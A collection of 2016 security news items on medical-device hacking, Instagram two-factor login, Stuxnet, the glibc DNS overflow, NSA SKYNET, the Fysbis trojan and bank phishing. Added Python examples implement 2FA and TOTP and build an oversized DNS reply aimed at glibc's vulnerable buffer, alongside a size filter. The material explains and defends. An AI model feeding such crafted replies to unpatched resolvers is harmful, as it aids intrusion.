“If something goes wrong with medical equipment, if someone hacked a device that helps a doctor to identify an illness, if someone could affect this data, a healthy person could be treated as an ill person or the opposite,” he said. “If someone affects the results of, for example, MRI, it could be really rough.”

In his talk, Lozhkin described how he was able to break into a hospital's network with ease, and with the hospital's consent, after finding vulnerable medical devices listed on Shodan.

“I decided that this is a critical area and I wanted to research it. I decided to look on the internet, I found the hospital, tested the WiFi network and finally I was able to connect to an MRI device and find personal information and [flaws] in the architecture. It was scary because it was really easy,” he explained. “The initial vector was the WiFi network, the network was not really as secure as it should be in such a place where you keep medical data.”

Shodan is a search engine that indexes open ports across the internet and is frequently used by security researchers to uncover critical infrastructure that ought to be better protected. The 'search engine' nature of Shodan has often courted controversy for linking to exposed devices such as webcams and, most recently, baby monitors.

“[Shodan] can find out about the hardware and software connected [to the internet], and if you know, for instance, what output an MRI or laser or cardiology device gives when you connect to its port, you can go to Shodan and find several of these devices, and if you know a vulnerability you can hack all of them,” the Kaspersky researcher warned.

“In this case it was easy. Medical devices are still insecure, I can see it. Some manufacturers really secure them, but some [developers] are thinking about web security in second or third place.”

Looking at the future of IoT, Lozhkin added: “I think lots of people from both sides, the white-hat security researchers and the bad guys, are deeply researching this area – car hacking, connected cars, medical devices, everything. For cyber criminals it could be a big market.”

Most recently, an internal emergency was declared at a major US hospital in Los Angeles following a widespread ransomware attack that left staff unable to access essential patient data.


Instagram Adds Two-Step Verification to Prevent Account from being Hacked
17.2.2016 Hacking
Hijacking an online account is not a complicated procedure, at least not in 2016.
Today, Instagram confirmed that it is in the process of rolling out two-factor authentication for its 400 million users.
It is impossible to make your online accounts hack-proof, but you can make them less vulnerable.
So what can you do to protect yourself from hackers?
Several companies offer additional safeguards such as encrypted channels, security questions, strict password policies and so on.
But what would you do if a hacker had somehow obtained your account password?
Beyond matching a username and password, an online account has no built-in way to verify that the person logging in is its legitimate owner.
Hence the concept of two-factor authentication (2FA) was born.
Giants such as Google, Facebook, Twitter and Amazon have already added 2FA to their services to counter account hijacking.
Two-factor authentication, or two-step verification, is an additional security mechanism that confirms a user is legitimate only after a second identification step: a randomly generated security code is sent to the user by call or SMS and must be entered alongside the password.
Two-factor authentication keeps hackers out of your online accounts even if they have your username and password, although an SMS code can still be phished or intercepted by malware on the phone, so it raises the bar rather than eliminating the risk.
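As an added example in Python (not Instagram's or Facebook's code), here is the server side of the second step described above. The first part is the SMS/call form Instagram describes: a fresh random code per login that is short-lived, single use and limited to a few attempts, since a six-digit code only resists guessing if attempts are capped. The second part goes beyond the article to the app-based variant, TOTP per RFC 6238, which derives the code from a shared secret and the clock instead of sending it over the phone network. The secret, user names and the injectable clock are constructed for the example; in production the issued code goes to the SMS gateway, never back to the client.

```python
import hashlib
import hmac
import secrets
import struct
import time


class SmsCodeStore:
    """Server-side state for a code delivered by SMS or voice call.
    `clock` is injectable so expiry can be tested without sleeping."""

    def __init__(self, ttl=300, max_attempts=5, digits=6, clock=time.time):
        self.ttl, self.max_attempts, self.digits, self.clock = ttl, max_attempts, digits, clock
        self._pending = {}  # user -> [code, expires_at, attempts_left]

    def issue(self, user):
        # CSPRNG, fixed width with leading zeros so "000123" is as likely as any other code
        code = str(secrets.randbelow(10 ** self.digits)).zfill(self.digits)
        self._pending[user] = [code, self.clock() + self.ttl, self.max_attempts]
        return code  # hand this to the SMS gateway, not to the HTTP response

    def verify(self, user, code):
        entry = self._pending.get(user)
        if entry is None:
            return False
        stored, expires_at, attempts_left = entry
        if self.clock() > expires_at or attempts_left <= 0:
            del self._pending[user]  # expired or exhausted: the user must request a new code
            return False
        if hmac.compare_digest(stored.encode(), code.encode()):  # constant-time compare
            del self._pending[user]  # single use
            return True
        entry[2] -= 1  # burn one attempt on a wrong guess
        return False


def hotp(key, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key, unix_time, step=30, digits=6):
    """RFC 6238: HOTP with the counter derived from the clock (30-second steps)."""
    return hotp(key, int(unix_time) // step, digits)


def verify_totp(key, code, unix_time, step=30, digits=6, window=1):
    """Accept the current step plus/minus `window` steps of clock skew,
    comparing in constant time so timing does not reveal matching digits."""
    counter = int(unix_time) // step
    candidates = [hotp(key, counter + d, digits) for d in range(-window, window + 1)]
    return any(hmac.compare_digest(c.encode(), code.encode()) for c in candidates)


if __name__ == "__main__":
    store = SmsCodeStore()
    sent = store.issue("alice")          # constructed user
    print("sms code accepted:", store.verify("alice", sent))
    secret = b"12345678901234567890"    # the RFC 6238 reference secret, not a real key
    print("totp at t=59:", totp(secret, 59, digits=8))
```

The attempt budget and expiry are what make a short numeric code safe: without them, 10^6 guesses against a login endpoint is a few minutes of work. TOTP removes the SMS channel entirely, which is why it is the stronger option where the service supports it.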
Now the photo-sharing giant Instagram has joined the club by implementing two-step verification.
Better late than Never:
However, the decision could be criticised as overdue, since its parent company Facebook implemented 2FA five years ago.
Current users should not expect the new two-step verification feature immediately, as the company said it would roll out phone verification gradually.
But there is good news for Singapore residents: the first rollout will be for Singaporeans.
Instagram hacking has been a recurring story, with many videos and images of celebrities leaked online in past years.
Hackers can wreak havoc by hijacking or deleting Instagram accounts, flooding an account with illegitimate content and more. Taylor Swift was one such victim of an Instagram hack.
To protect yourself from hackers, enable two-factor authentication as soon as the Instagram security feature rolls out in your country.


GCHQ helped US in developing Stuxnet, claims a documentary
17.2.2016 BigBrothers

A new documentary titled Zero Days reveals that the Stuxnet cyber weapon was just a small part of a much bigger information warfare operation (code named “NITRO ZEUS”) against Iranian civilian infrastructure.
A new documentary titled Zero Days has revealed more disconcerting news about the Stuxnet worm, the first malware recognised by the security industry as a cyber weapon. The documentary sheds light on the US war program that included the design of Stuxnet; it also reveals that hundreds of thousands of network implants and backdoors in Iranian networks were managed by Western entities to penetrate Iranian infrastructure and destroy it.

Zero Days, presented at the Berlin Film Festival, confirms that Stuxnet was developed under the information warfare operation called “Olympic Games,” itself part of a wider programme dubbed “Nitro Zeus” that involved hundreds of US cyber security experts. The US was not alone: the Israeli government had a primary role in the Nitro Zeus program.

The documentary confirms that the nation-state hackers behind Stuxnet spent significant effort trying to keep their operation covert, and designed the threat to operate only against Iranian machines.

One of the most intriguing claims in the documentary is the involvement of GCHQ: the film contends that British intelligence provided information for the development of the four zero-day exploits specifically designed to hit the control systems at the Natanz facility.

NSA experts worked hard to cover their tracks after the infection became public, but the author of the report confirmed the existence of a more aggressive version of Stuxnet, developed by the Israeli side, that went out of control and infected thousands of computers across more than 115 countries.

It is not clear whether GCHQ was informed about the Nitro Zeus program.


Thousands of Linux programs and entire distributions most likely suffer from a critical flaw
17.2.2016
Vulnerabilities

GNU C Library 2.9 and later (glibc), the standard C library used above all on Linux systems, has for the past eight years carried a critical bug, CVE-2015-7547, that allows execution of malicious code. The flaw was noticed independently by several specialists at Red Hat and Google, who described it on Google's security blog.

Google's engineers stumbled on the bug after their SSH client crashed every time it tried to connect to a particular host on the network. The programmers first thought the problem was in their own program, but over time they found that the culprit was glibc itself and its getaddrinfo() function, which handles DNS resolution of a domain name to an IP address.

Google's test and the application crash: the system is vulnerable (Photo: Kenn White for Ars Technica)

A particular domain name, or the behaviour of the DNS server, can trigger a stack-based buffer overflow during resolution, leading to a segmentation fault that an attacker could exploit to run their own malicious code.

Google's engineers also prepared a test for these cases with which you can check whether a given system is vulnerable. The test consists of a small piece of C code that calls getaddrinfo() and a Python script that plays the attacker. The test's source code is available on GitHub. If the application does not crash when it is run, your system is not affected.

Potentially enormous risk

Because the bug sits in a core library of the C language, it affects an enormous amount of Linux software that was built against glibc 2.9 or later and makes DNS queries, which is the case for practically all Linux distributions, popular programs such as wget, curl and sudo, the PHP and Python interpreters, and so on.


Good news for Android owners: its code is built on a glibc offshoot called Bionic and the bug does not affect it

Fixing the bug may be fairly complicated. Older software statically linked against the problematic library carries the bug in its own binary, and if no one maintains it any more, it will remain exploitable. While software on Linux workstations and servers is usually updated continuously, network boxes without automatic updates, led by older home Wi-Fi routers and the like, may now come into the sights of attackers, who have just received an interesting new weapon. It is enough for such a vulnerable device to use their malicious DNS server, and they will have a feast.

Although we often mock Windows and some of the bugs Microsoft has had to deal with, it is a continuously updated OS. Millions of network boxes with a Linux kernel inside, whose updates nobody has handled for a long time, are in the case of bugs like this a potential road to hell. It is all the more important that the emerging IoT treats continuous security updates of firmware as a matter of course.

In its potential the case recalls the Heartbleed bug of spring 2014, which prompted better funding of code audits for key open-source software. Its theoretical security advantage over proprietary software really does lie in the fact that anyone can look at the code and hunt for bugs, but a thorough analysis of large projects requires time and skilled experts, so in the end it costs money, and is therefore not as much of a given as many might think.


NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians
17.2.2016 BigBrothers
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians With Drones
So what do you expect from an Artificially intelligent program run by the government intelligence agency?
Possibly killing innocent people.
The real-life SKYNET, named after the malevolent artificial intelligence in the Terminator films and run by the US National Security Agency (NSA), is a surveillance program that uses mobile phone metadata to track the location and call activity of suspected terrorists, who may then be targeted with a Hellfire missile.
Now, a new analysis of previously published NSA documents leaked by former NSA contractor Edward Snowden suggests that many of the people killed on the basis of metadata may have been innocent.
Last year, leaked documents detailing the NSA's SKYNET programme, published by The Intercept, showed that the NSA had run a machine-learning algorithm over the mobile network metadata of 55 million people in Pakistan to rate each person's likelihood of being a terrorist.
Bear in mind that the US drone campaign in Pakistan has been raging for years.
Elementary Errors in SKYNET
However, the agency made elementary errors in its machine-learning methodology, leading to thousands of false leads and potentially exposing innocent people to remote assassination by drone.
One of the leaked slides claimed that SKYNET had a false-positive rate of 0.008% in some cases, and the NSA was feeding about 55 million people's phone records into it.
But, as Ars Technica points out, even at that tiny rate many innocent people would be mislabelled: 0.008% of 55 million is roughly 4,400 people. Some of the NSA's tests showed higher error rates of 0.18%, which would mislabel nearly 99,000 people out of the 55 million.
"There are very few 'known terrorists' to use to train and test the model," Patrick Ball, the executive director of Human Rights Data Analysis Group, told the site. "If they are using the same records to train the model as they are using to test the model, their assessment of the fit is completely bullshit."
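The two numerical points above, the false-positive arithmetic and Ball's objection to scoring a model on the records it was trained on, as an added illustration in Python. This is not NSA material or Ars Technica's code; the population, the rates, the assumed base rate of 2,000 real targets and the toy dataset are all constructed for the example.

```python
import random


def expected_false_positives(fpr, population):
    """How many innocent people a classifier flags at a given false-positive rate."""
    return fpr * population


def precision(tpr, fpr, base_rate):
    """Share of flagged people who are real targets (Bayes' rule).
    With a base rate of a few thousand in 55 million, even a 0.008% FPR
    means most of the flagged people are innocent."""
    tp = tpr * base_rate
    fp = fpr * (1.0 - base_rate)
    return tp / (tp + fp)


def _nearest_label(point, train):
    """1-nearest-neighbour classifier: the label of the closest training record."""
    best = min(train, key=lambda t: sum((a - b) ** 2 for a, b in zip(point, t[0])))
    return best[1]


def nn_accuracy(train, evaluate):
    """Fraction of `evaluate` records whose nearest neighbour in `train` has the same label."""
    hits = sum(_nearest_label(x, train) == y for x, y in evaluate)
    return hits / len(evaluate)


def leakage_demo(n=200, dims=3, seed=1):
    """Constructed data: labels are a coin flip, independent of the features, so
    there is nothing to learn. Scoring on the training records still reports 100%,
    because every record is its own nearest neighbour; a held-out set reports
    chance. Returns (accuracy on training data, accuracy on held-out data)."""
    rng = random.Random(seed)

    def sample():
        return [(tuple(rng.random() for _ in range(dims)), rng.randint(0, 1)) for _ in range(n)]

    train, held_out = sample(), sample()
    return nn_accuracy(train, train), nn_accuracy(train, held_out)


if __name__ == "__main__":
    population = 55_000_000
    print("flagged at 0.008%:", expected_false_positives(0.00008, population))
    print("flagged at 0.18%: ", expected_false_positives(0.0018, population))
    print("precision, 2,000 real targets, TPR 0.5:", precision(0.5, 0.00008, 2000 / population))
    print("train-on-test vs held-out accuracy:", leakage_demo())
```

The precision figure is the one a slide quoting only a false-positive rate hides: at a base rate this low, a flagged record is far more likely to be a false alarm than a hit. The leakage demo is the mechanism behind Ball's remark; any memorising model looks perfect on its own training data.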
The exact purpose SKYNET serves is not yet clear. Although it could be part of non-violent surveillance programs such as tracking and monitoring suspected terrorists, Ars suggests the technology could also be used to select targets for drone strikes.
US Drone Strikes Have Killed Almost 4,000 People
Since 2004, the United States government has carried out hundreds of drone strikes against alleged terrorists in Pakistan, killing somewhere between 2,500 and 4,000 people, according to the Bureau of Investigative Journalism.
The NSA has not commented on how the agency used SKYNET or how the model was trained.
But does killing people "based on metadata" actually make sense?
Maybe it is easy to say yes, because it happened, or is happening, far away in a foreign land. But imagine if SKYNET were turned on us.


Linux Fysbis Trojan, a new weapon in the Pawn Storm’s arsenal
17.2.2016 Virus

Malware researchers at Palo Alto Networks discovered the Fysbis Trojan, a simple but effective Linux threat used by the Russian cyber-espionage group Pawn Storm.
Do you remember the Pawn Storm hacking crew? Security experts have given this group of Russian hackers several names, including APT28, Sofacy and Sednit; it has been active since at least 2007.

The name Pawn Storm is used by security experts to refer to an active economic and political cyber-espionage operation targeting a wide range of entities, most of them in the military, government and media sectors.

Specific targets include:

Military agencies, embassies, and defense contractors in the US and its allies
Opposition politicians and dissidents of the Russian government
International media
The national security department of a US ally
The Pawn Storm APT group is considered a highly sophisticated threat with zero-day exploits in its arsenal. The group has used several strains of malware for the different operating systems on the market, including mobile spyware designed to infect Apple iOS devices. One of the principal tools used by the Russian hackers is a Windows backdoor called Sednit.

Now the group is back, targeting Linux systems with a Trojan dubbed Fysbis that can compromise targets without requiring highly privileged access. According to the malware researchers at Palo Alto Networks, Fysbis is a preferred tool for infecting Linux systems even though it is not a sophisticated threat.

“The Linux malware Fysbis is a preferred tool of Sofacy, and though it is not particularly sophisticated, Linux security in general is still a maturing area, especially in regards to malware. In short, it is entirely plausible that this tool has contributed to the success of associated attacks by this group. This blog post focuses specifically on this Linux tool preferred by Sofacy and describes considerations and implications when it comes to Linux malware.” the Palo Alto Networks researchers said Friday in a blog post.

The Fysbis Trojan has a modular structure: the core components are a set of plugins that can be loaded to add new functionality to the agent.

“Fysbis is a modular Linux trojan / backdoor that implements plug-in and controller modules as distinct classes. For reference, some vendors categorize this malware under the Sednit attacker group naming designation. This malware includes both 32-bit and 64-bit versions of Executable and Linking Format (ELF) binaries. Additionally, Fysbis can install itself to a victim system with or without root privileges.” continues the analysis published by Palo Alto Networks.

The Fysbis Trojan is designed to exfiltrate potentially sensitive documents and spy on the user's web browsing and other activity.

The experts at Palo Alto Networks' Unit 42 have observed that APT groups tend to reuse historical command-and-control infrastructure. The analysis of the Fysbis samples confirmed this behaviour, although in the latest variants the threat actor also used previously unknown servers.

The choice to develop a Linux Trojan does not surprise the experts: Linux is the preferred platform in data centres, business cloud infrastructure and application servers, and it is also the core of Android devices and many other embedded systems. There is another aspect to consider: most business environments run mainly Windows systems and deploy defences tuned to Windows threats, which makes Linux malware easier to miss.


They want to empty people's bank accounts, and they are using Facebook to do it

17.2.2016 Social networks
Clients of Česká spořitelna should be very vigilant in the coming days. After phishing attacks via unsolicited e-mails, computer pirates are now also trying to outwit the bank's users through the social network Facebook, where they lure them with a new version of the Servis24 internet banking.

The offer of a new version of internet banking appears on Facebook as a suggested post, which means the fraudsters simply paid for it as an advertisement. Users can easily be misled, because similar adverts genuinely are used to promote services.

Moreover, the message is written in flawless Czech. More attentive users can therefore recognise the phishing scam only by the web address, which does not lead to the real Servis24 service.

This is what the call to use the new internet banking looks like on Facebook. (Photo: Česká spořitelna)

Instead, people end up on the site mbanking365.cz. "Through the fraudulent message the attackers redirect you to a fake internet banking login page and then try to extract your login credentials," Česká spořitelna representatives warned.

With the login credentials in hand they are only a step away from emptying people's accounts. Essentially all they need is to smuggle a virus onto the victim's smartphone so they can intercept the confirmation SMS messages. With that they can carry out payments themselves.

"Be very cautious about messages from unknown sources. Under no circumstances respond to the message or click on its content, and do not click on the link it contains. If you have already clicked on the link and filled in the requested data, immediately contact the Česká spořitelna client line on the toll-free number 800 207 207," they added.

Three attacks in two weeks
This is already the third phishing attack in the last two weeks aimed at Česká spořitelna users. In the first, the attackers tried to push the fraudulent page on people by claiming they had detected unusual activity on their account.

Then they sent unsolicited e-mails claiming the recipient had reached the maximum number of failed login attempts. Servis24 could supposedly be reactivated by logging in to the account, but the link of course led to a fraudulent page again.


We have detected unusual activity, the pirates claim.
Sample of the new fraudulent message
You have reached the maximum number of failed login attempts, the cybercriminals claim in another unsolicited e-mail.


Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)
17.2.2016 Vulnerebility
A highly critical vulnerability has been uncovered in the GNU C Library (glibc), a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices open to attackers who could take full control of them.
Merely clicking on a link or connecting to a server can result in remote code execution (RCE), allowing attackers to steal credentials, spy on users, seize control of computers and more.
The vulnerability is similar to last year's GHOST vulnerability (CVE-2015-0235), which left countless machines open to remote code execution (RCE) attacks and was a major Internet threat.
GNU C Library (glibc) is an open source library that underpins thousands of standalone apps and most Linux distributions, including those shipped on routers and other hardware.
The flaw, indexed as CVE-2015-7547, is a stack-based buffer overflow in glibc's DNS client-side resolver, which translates human-readable domain names such as google.com into IP addresses.
The overflow is triggered when the getaddrinfo() library function that performs domain-name lookups is used, and can allow remote execution of malicious code.
How Does the Flaw Work?
The flaw can be exploited when an affected device or app queries a malicious DNS server that returns more data than the lookup expects, overflowing the program's stack buffer with attacker-controlled bytes.
Those bytes corrupt the vulnerable application's memory and can be used to take control of the whole system.
An attacker can also plant a hostname in server log files; when something later resolves that name, the lookup triggers the overflow. An SSH (Secure Shell) client connecting to a server could also be compromised.
However, an attacker needs to bypass several operating system security mechanisms, such as ASLR and non-executable stack protection, to achieve a working RCE attack.
Alternatively, an attacker on your network could mount a man-in-the-middle (MitM) attack and tamper with DNS replies, injecting malicious payloads into the data flowing between a vulnerable device and the Internet.
Affected Software and Devices
glibc 2.9 and later are vulnerable. Therefore any software or application that connects to things on a network or the Internet and uses glibc is at RISK.
The widely used SSH, sudo and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications is almost too diverse and numerous to enumerate completely.
The vulnerability could extend to nearly all major software, including:
Virtually all Linux distributions.
Programming language runtimes such as Python, PHP and Ruby on Rails.
Many others that use glibc to look up the numerical IP address of an Internet domain.
Most Bitcoin software is reportedly vulnerable, too.
Who are Not Affected
The good news is that users of Google's Android mobile operating system are not vulnerable to this flaw, as Android uses a glibc substitute called Bionic that is not susceptible, according to a Google representative.
Additionally, many embedded Linux devices, including home routers and various gadgets, are not affected because they use the lighter-weight uClibc library instead of the hefty glibc.
The vulnerability was introduced in May 2008 but was only reported to the glibc maintainers in July 2015.
It was discovered independently by researchers at Google and Red Hat, who found no evidence that it had been publicly attacked.
The flaw came to light when one of Google's SSH apps hit a severe error called a segmentation fault each time it attempted to contact a particular Internet address, Google's security team reported in a blog post published Monday.
Where glibc went Wrong
Google researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution possible. The researchers then notified the glibc maintainers.
Here's what went wrong, according to the Google engineers:
"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated."
"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow."
Proof-of-Concept Exploit Released
Google engineer Fermin J. Serna released proof-of-concept (PoC) exploit code on Tuesday.
With this PoC code, you can verify whether you are affected by this critical issue and test any mitigations you wish to enact.
Patch glibc Vulnerability
Google researchers, working with security researchers at Red Hat, have released a patch to fix the programming blunder.
However, it is now up to the Linux distributions and device manufacturers to roll out the patch to their affected software and devices as soon as possible.
For people running servers, fixing the issue is a matter of installing the updated glibc package and then restarting the affected services (or rebooting), because already-running processes keep the old library mapped in memory.
But for other users, patching the problem may not be so easy. Apps statically linked against a vulnerable glibc must be recompiled with the fixed version, a process that takes time, as users of those apps have to wait for updates from the developers.
Meanwhile, if you cannot patch your instance of glibc immediately, you can reduce exposure by limiting all TCP DNS replies to 1024 bytes and dropping UDP DNS packets larger than 512 bytes, for example on a local caching resolver or firewall; note that this also blocks legitimate large answers such as DNSSEC-signed responses, so it is a stop-gap rather than a fix.
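As an added example in Python, not Google's proof of concept and not code from this article, the following builds a DNS reply in wire format that is far larger than the 2048-byte stack buffer described in the "Where glibc went Wrong" section, so you can see what a resolver would be handed, and it implements the size-based stop-gap filter from the paragraph above. The hostname and the 10.0.x.y addresses are made up. It does not exploit anything: a working attack also needs the specific UDP/TCP reply sequence from Google's write-up and a bypass of ASLR and the non-executable stack. It only shows the shape of the input and what the filter would drop.

```python
import struct

STACK_BUFFER = 2048                        # bytes glibc set aside on the stack via alloca()
REPLY_LIMITS = {"tcp": 1024, "udp": 512}   # stop-gap limits quoted in the article


def encode_name(name):
    """Encode a dotted hostname as DNS labels (length byte + label), zero-terminated."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name, qtype=1, txid=0x1234):
    """Recursive query: 12-byte header plus one question (type A by default)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def build_oversized_reply(query, n_answers=200):
    """Answer the query with n_answers A records. Each is 16 bytes on the wire:
    a 2-byte compression pointer to the question name (0xC00C), type, class,
    TTL, rdlength and a 4-byte address. 200 of them is well past STACK_BUFFER."""
    txid, _flags, qdcount, *_ = struct.unpack(">HHHHHH", query[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    question = query[12:]                                  # echo the question section
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, n_answers, 0, 0)
    answers = b"".join(
        struct.pack(">HHHIH4B", 0xC00C, 1, 1, 60, 4, 10, 0, (i >> 8) & 0xFF, i & 0xFF)
        for i in range(n_answers)                          # made-up 10.0.x.y addresses
    )
    return header + question + answers


def answer_count(reply):
    """ANCOUNT field of the reply header."""
    return struct.unpack(">HHHHHH", reply[:12])[3]


def overflows_stack_buffer(reply):
    """Would this reply fail to fit in the 2048-byte stack buffer?"""
    return len(reply) > STACK_BUFFER


def reply_allowed(reply_len, transport):
    """The article's stop-gap filter: drop TCP replies over 1024 bytes and UDP
    replies over 512 bytes. Coarse, and it also drops legitimate large answers
    (DNSSEC), so it bridges the gap to patching rather than replacing it."""
    return reply_len <= REPLY_LIMITS[transport]


if __name__ == "__main__":
    q = build_query("example.com")       # constructed sample hostname
    r = build_oversized_reply(q)
    print("reply bytes:", len(r), "answers:", answer_count(r))
    print("exceeds stack buffer:", overflows_stack_buffer(r))
    print("passes TCP stop-gap filter:", reply_allowed(len(r), "tcp"))
```

The point of `reply_allowed` is that the filter works on the length prefix of a TCP reply or the UDP datagram size, before any parsing, which is exactly why it is cheap to deploy and why it cannot tell a hostile reply from a large but honest one.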
For more in-depth information on the glibc flaw, you can read Red Hat blog post.